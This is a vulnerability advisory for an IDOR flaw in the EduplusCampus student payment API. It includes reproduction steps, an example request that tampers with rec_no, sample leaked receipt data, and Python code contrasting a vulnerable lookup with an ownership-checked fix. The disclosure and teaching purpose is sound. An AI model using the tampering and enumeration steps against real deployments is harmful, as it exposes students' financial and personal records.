# CVE-2025-61148: IDOR in EduplusCampus Student Payment API

The vulnerability exists in the Student Payment API of EduplusCampus. The application fails to validate whether the user requesting a payment receipt is authorized to view it. By modifying the `rec_no` parameter in the API request, an authenticated user can retrieve the receipts of other students.

* **CVE ID:** CVE-2025-61148
* **Vulnerability Type:** Insecure Direct Object Reference (IDOR)
* **Affected Product:** EduplusCampus
* **Affected Endpoint:** `/student/get-receipt`
* **Researcher:** Vinay Sharma

## Summary

A critical Insecure Direct Object Reference (IDOR) vulnerability was identified in the EduplusCampus student portal (version 3.0.1). It allows any authenticated user to access the personal and financial records of other students by changing the `rec_no` parameter in the request to `/student/get-receipt`. No privilege beyond a normal student login is required.

## Impact

Successful exploitation allows an attacker to retrieve, for any receipt number they can guess:

* Full Name and Roll Number
* Payment Amount and Dates
* Transaction IDs (TID) and Bank Details
* Personally Identifiable Information (PII)

Because receipt numbers are predictable, the issue allows bulk enumeration of the financial records of the whole student body rather than a one-off disclosure.

## Vulnerability Details

The server looks up a receipt by `rec_no` alone and never checks that the receipt belongs to the currently logged-in user. Receipt numbers follow a predictable format (e.g. `PCUF-232025`), so valid values belonging to other students can be guessed or enumerated sequentially, and the server returns the full receipt details for every valid number requested.

### Steps to Reproduce

1. Log in to the student portal.
2. Navigate to the receipt generation section.
3. Intercept the POST request to `/student/get-receipt`.
4. Locate the `rec_no` parameter in the JSON body.
5. Modify the `rec_no` value to another valid receipt number (e.g., change `PCUF-232025` to `PCUF-231824`).
6. Send the request.
7. The server responds with the personal and financial details of the student associated with that receipt number.
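The following is an added illustration of the flaw and its fix, not code from EduplusCampus: a minimal in-memory receipt store with a handler that looks receipts up by `rec_no` alone (the vulnerable pattern described above) next to a handler that additionally requires the receipt to belong to the session user. The receipt numbers, roll numbers, names and the `Receipt` type are constructed sample data; the real product's data model is not known.

```python
"""Vulnerable vs. hardened receipt lookup for the rec_no IDOR pattern.

Added example, not EduplusCampus code. The store, the PCUF-... receipt
numbers, the roll numbers and the session model are all constructed.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Receipt:
    rec_no: str
    owner_rollno: str   # the student the receipt belongs to
    fullname: str
    amount: float
    tid: str


# Constructed sample data: one receipt each for two different students.
RECEIPTS = {
    "PCUF-232025": Receipt("PCUF-232025", "CSE2019001", "Student A", 55000.0, "429510001"),
    "PCUF-231824": Receipt("PCUF-231824", "CSE2019002", "Student B", 55000.0, "429510002"),
}


def serialize(r: Receipt) -> dict:
    """Shape the response the way the advisory's leaked-data sample is shaped."""
    return {
        "fullname": r.fullname,
        "rollno": r.owner_rollno,
        "component_total_amount": r.amount,
        "trans_list": [{"amount": r.amount, "tid": r.tid}],
    }


def get_receipt_vulnerable(session_rollno: str, rec_no: str):
    """Mirrors the flaw: the lookup is keyed on rec_no only.

    session_rollno (the authenticated caller) is accepted but never consulted,
    so any logged-in student can read any receipt whose number they can guess.
    Returns (http_status, body).
    """
    receipt = RECEIPTS.get(rec_no)
    if receipt is None:
        return 404, None
    return 200, serialize(receipt)


def get_receipt_fixed(session_rollno: str, rec_no: str):
    """Authorization check: the receipt must belong to the session user.

    The ownership test is part of the lookup itself, not a separate step that a
    later code path could forget.  A foreign rec_no gets the same 404 as a
    non-existent one, so the endpoint cannot be used as an oracle to confirm
    which receipt numbers are valid.
    """
    receipt = RECEIPTS.get(rec_no)
    if receipt is None or receipt.owner_rollno != session_rollno:
        return 404, None
    return 200, serialize(receipt)


def enumerate_receipts(handler, session_rollno: str, candidates):
    """Simulate the parameter tampering from the reproduction steps.

    Replays a list of candidate rec_no values through a handler as one
    session user and returns the numbers that yielded a receipt.  Against the
    vulnerable handler every valid number comes back; against the fixed one
    only the caller's own receipts do.
    """
    return [rec for rec in candidates if handler(session_rollno, rec)[0] == 200]


if __name__ == "__main__":
    attacker = "CSE2019001"
    print("vulnerable:", enumerate_receipts(get_receipt_vulnerable, attacker, list(RECEIPTS)))
    print("fixed:     ", enumerate_receipts(get_receipt_fixed, attacker, list(RECEIPTS)))
```

In a database-backed service the equivalent of `get_receipt_fixed` is to put the owner into the query itself (`WHERE rec_no = ? AND rollno = ?`, with `rollno` taken from the server-side session, never from the request body), so that a receipt the caller does not own simply does not exist from the caller's point of view.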
### Example Request

```http
POST /student/get-receipt HTTP/1.1
Host: student.edupluscampus.com
Content-Type: application/json
Authorization: Bearer 

{ "rec_no": "PCUF-233012" }
```

### Leaked Data Example

```json
{
  "fullname": "REDACTED_NAME",
  "rollno": "CSE2019XXX",
  "component_total_amount": 55000.0,
  "trans_list": [
    {
      "date": "21-Oct-2024",
      "mode": "Online",
      "amount": 55000.0,
      "tid": "42951XXXX"
    }
  ]
}
```

### Vendor Information

* **Vendor:** EduplusCampus
* **Product:** EduplusCampus Student Portal / Student Payment API

### Affected Versions

* **Version:** EduplusCampus 3.0.1

### Discoverer

* **Vinay Sharma** - Security Researcher